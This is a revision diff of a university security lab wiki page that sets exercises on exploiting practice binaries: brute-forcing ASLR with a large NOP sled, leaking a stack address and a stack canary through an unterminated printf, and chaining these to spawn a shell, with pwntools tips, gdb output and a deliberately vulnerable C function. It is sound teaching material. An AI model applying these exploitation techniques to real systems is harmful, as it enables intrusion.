+So we have about 2MB for //all the arguments and environment variables//, which doesn't give us a fully reliable attack surface, but it easily provides trial-end-error potential.
+We recommend you use something around ''100000'' bytes (a.k.a ''100k'' bytes) for the NOP sled. A Python construct such as
+<code>
+nopsled = "\x90" * 100000
+</code>
+</note>
 <note tip>
-If you find yourself running out of shellcode space, remember that there's plenty of space //after// the return address ;-)
+Note that simply increasing the NOP sled size isn't enough. You still need to randomize the target return address using [[https://docs.python.org/2/library/random.html|Python's random]]. The target format is exactly the one explained in the previous tip: ''ff'' + 20 random bits + ''8'' (although the least significant nibble could be any multiple of 4 in principle).
 </note>
 <note tip>
-You will also need to push the "Hello World!\n" string onto the stack. You can use the following hack in order to do this:
+Some Python tips:
-<code asm>
+  * You can simply run the payload injection and random generation in a ''while True'' loop
-call label
+  * The process will simply return an ''EOF'' when it ''SIGSEGV''s. You can do a timed-out ''recv'' (see [[http://docs.pwntools.com/en/stable/tubes.html#pwnlib.tubes.tube.tube.recv|pwntools' processes]]) in a [[https://docs.python.org/2.7/tutorial/errors.html#handling-exceptions|''try/except'' block]] that only launches the interactive shell when we know the child process hasn't closed its end of the pipe.
-db "Hello World", 0xa
+  * When an ''EOF'' occurs, make sure to terminate the process/tube and close its descriptors in order to free resources. Use<code>
+io.terminate()
+io.wait()
+io.close()
 </code>
+</note>
-The call instruction will push the address of the next "instruction" (in this case, our string), onto the stack.
+<note tip>
+While running the exploit script (using ''pwntools'') you may end up getting a shell prompt, typing ''ls'' or some other command and nothing happening. That's because ''pwntools'' didn't timeout when doing a receive and served you a prompt; but it didn't actually reach the shellcode. So let it run until it reaches the shellcode and a shell will get spawned and all your command (such as ''ls'') will work.
 </note>
+==== 2. Stackbleed: infoleak + ASLR bypass  ====
-==== 2. execve [3p] ====
+Examine ''stackbleed.c''; ''%%get_user_input%%'' calls ''read'' twice:
-Now for the real challenge, write a shellcode which actually spawns a shell. The equivalent C call is the following:
 <code C>
-execve('/bin/sh', ['/bin/sh'], 0);
+void get_user_input(void)
+{
+	char *env = getenv("SHELLCODE");
+	char buf[BUFFER_SIZE];
+	read(STDIN_FILENO, buf, BUFFER_SIZE);
+	printf("%s\n", buf);
+	read(STDIN_FILENO, buf, 12*BUFFER_SIZE);
+}
 </code>
-Where //['/bin/sh']// denotes the **address** of the string '/bin/sh'.
+The first ''read'' is seemingly correct, only it has one big problem: it doesn't set the string NULL terminator, so the ''printf'' right after it can easily leak ''env''. Let's give it a try:
+<code>
+$ python -c 'import sys; sys.stdout.write("ABCD")' | SHELLCODE="\x90\x90\x90\x90" ./stackbleed | xxd
+00000000: 4142 4344 d90f d3ff 010a                 ABCD......
+</code>
+We can safely assume that the bytes ''d90fd3ff'' are in fact the value in ''env'' (''0xffd30fd9'').
+**The task**: using the infrastructure from the tutorial and the previous tasks, build an automated exploit that uses this infoleak to jump to the address of ''SHELLCODE''.
 <note tip>
-You need to get the string '/bin/sh' on the stack. You can do this using two **push** instructions. Since the string is 7 bytes long, you can add one more, either '%%//%%bin/sh', or '/bin%%//%%sh'.
+Since the attacker needs to be precise about how many characters they write in the first phase, they are better served by ''send'', instead of ''sendline''. Consult the [[http://docs.pwntools.com/en/stable/tubes.html|pwnlib tubes]] documentation for more details.
 </note>
 <note tip>
-You can browse around shellstorm for examples; however, keep in mind that they may not work due to some registers not being set properly.
+When computing the offset from the start of ''buf'' to the return address please note that the first ''read()'' call reads ''4'' bytes and then the second ''read()'' call reads again starting from ''buf''.
 </note>
-==== 3. execve with no zeros [2p] ====
-Inspect the code of vuln2.asm. What changed? How is your input passed?
+<note>
+In order to unpack a byte string address to an integer and print it, you can use the [[http://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack|unpack() functionality in pwn]] similar to the code below:
+<code>
+log.info("Canary is: 0x{:08x}".format(unpack(canary, 'all', endian='little', sign=False)))
+</code>
-Some functions, such as **strcpy**, **sprintf** and **strcat** stop whenever a NULL byte is reached. If you inspect your previous shellcodes using **xxd**, you will notice that they have plenty of NULL ('0x00') bytes in them, so your lifelong dream for world domination will be cut short whenever these functions are used.
+Or, if you set the context properly (e.g. ''context.binary = "./stackbleed"''), you can skip the arguments to ''unpack'':
+<code>
+log.info("Canary is: 0x{:08x}".format(unpack(canary)))
+</code>
+</note>
+==== 3. Extra: infoleak + stack canary bypass  ====
-However, there's more than one way <del>to skin a cat</del> to write assembly. Convert your previous shellcode into one that contains no NULLs and use it to exploit **vuln2**.
+Examine ''canary.c'' and the resulting ''canary'' executable file. It is once again very similar to the previous incarnations, but we will use it for something somewhat different: leaking the stack canary and bypassing it.
+Knowing that ''buf'''s size is 4, we want to determine exactly where the canary value starts. For now, let's take a look at ''vulnerable3'' with GDB:
-<note tip>
-**Some common replacements**
 <code asm>
-mov <reg>, 0 <-> xor <reg>, <reg>
+$ gdb -q ./canary
-mov <reg>, value <-> push value, pop <reg>
+Reading symbols from ./vulnerable3...done.
+gdb-peda$ pdis get_user_input
+Dump of assembler code for function get_user_input:
+x0804848b <+0>:	push   ebp
+x0804848c <+1>:	mov    ebp,esp
+x0804848e <+3>:	sub    esp,0x18
+x08048491 <+6>:	mov    eax,gs:0x14
+x08048497 <+12>:	mov    DWORD PTR [ebp-0xc],eax
+...
+x080484c9 <+62>:	call   0x8048340 <read@plt>
+x080484ce <+67>:	add    esp,0x10
+x080484d1 <+70>:	nop
+x080484d2 <+71>:	mov    eax,DWORD PTR [ebp-0xc]
+x080484d5 <+74>:	xor    eax,DWORD PTR gs:0x14
+x080484dc <+81>:	je     0x80484e3 <get_user_input+88>
+x080484de <+83>:	call   0x8048350 <__stack_chk_fail@plt>
+x080484e3 <+88>:	leave
+x080484e4 <+89>:	ret
+End of assembler dump.
 </code>
+Looking at the prologue and epilogue, we see that the following operations are included:
+  * A move into ''eax'' (and then on the stack) of a value coming from ''gs:0x14''.
+  * The comparison of the value on the stack with the reference in ''gs:0x14''.
+Let's take a look at that value by breakpointing at the instruction right after the ''eax'' assignment:
+<code>
+gdb-peda$ b *0x08048497
+Breakpoint 1 at 0x8048497: file canary.c, line 8.
+gdb-peda$ r < <(echo -n "AAAA\n")
+...
+gdb-peda$ print $eax
+$1 = 0xe27b7000
+</code>
+The canary value is ''0xe27b7000'' but it will differ at each run. One observation is that the canary value will almost always start with a least-significant ''NUL'' byte (i.e. ''%%'\0'%%''). This is actually meant to protect against ''printf''-based information leaks, so let's experiment a bit:
+<code>
+$ # we give "ABCD" as an input
+$ python -c 'import sys; sys.stdout.write("ABCD")' | ./canary | xxd
+00000000: 4142 4344 0a                             ABCD.
+$ # we give "ABCD\n" as an input
+$ python -c 'import sys; sys.stdout.write("ABCD\n")' | ./canary | xxd
+*** stack smashing detected ***: ./canary terminated
+...
+00000000: 4142 4344 0a7e 3d76 010a                 ABCD.~=v..
+</code>
+In the first run we sent 4 bytes as input, but were unable to leak the canary value address since it start with a ''NUL'' byte and the ''printf'' call stops there. In the second run we've overwritten the ''NUL'' byte with the newline character (''\n'', ''0xa'').
+**Your task** is to inject an input that leaks the canary value, then, in the second read overwrite the value and trigger a ''SIGSEGV'' at ''0x45454545''.
+<note>
+The "least-significant ''NUL''-byte" rule is more of an assumption we're making than an actual principle. Sometimes the randomly-chosen canary values may also contain ''NUL'' bytes in other positions, in which case our approach won't work too well. Still, any extra byte that we guess is a step towards a bypass.
 </note>
-==== 4. Ending with style: pwntools [3p] ====
+==== 4. Extra: infoleak + stack canary + ASLR bypass  ====
+Now that you've learned about bypassing ASLR (through brute force) and bypassing stack canary through information leak, combine the exploit from [[#brute-force_aslr_bypass_3p|Task 1: Brute-force ASLR bypass]] with the one from [[#extrainfoleak_stack_canary_bypass_2p|Task 3: infoleak + stack canary bypass]] and exploit ''vulnerable3'' to get a shell.
+<note tip>
+You will use the random generation and loop for starting a process tube from [[#brute-force_aslr_bypass_3p|Task 1: Brute-force ASLR bypass]] with the information leak and payload crafting from [[#extrainfoleak_stack_canary_bypass_2p|Task 3: infoleak + stack canary bypass]].
+</note>
+===== Resources =====
-Lastly, let's use [[https://github.com/Gallopsled/pwntools|pwntools]] to do most of the work for us and exploit **vuln** once more. Fill in the values in **skel_pwn.py** and run the script.
+  * [[http://phrack.org/issues/59/9.html#article|Bypassing PaX ASLR protection]]
+  * [[http://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx|Stack Overflows - Defeating Canaries, ASLR, DEP, NX]]
+  * [[https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/|Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR]]
+  * [[https://lwn.net/Articles/584225/|"Strong" stack protection for GCC]]
+  * [[http://wiki.osdev.org/Stack_Smashing_Protector|Stack Smashing Protector]]
+  * Python: [[https://docs.python.org/2/library/random.html|random]], [[https://docs.python.org/2/library/subprocess.html|subprocess]]
+  * pwntools: [[http://docs.pwntools.com/en/stable/tubes/processes.html|Processes]], [[http://docs.pwntools.com/en/stable/tubes.html|tubes]]
+  * [[http://man7.org/linux/man-pages/man2/execve.2.html|man execve]]

Resources

Labs

Lectures

Assignments

Extra

cns/labs/lab-06.1510507680.txt.gz · Last modified: 2017/11/12 19:28 by irina.presa

Show page Old revisions

Media Manager Back to top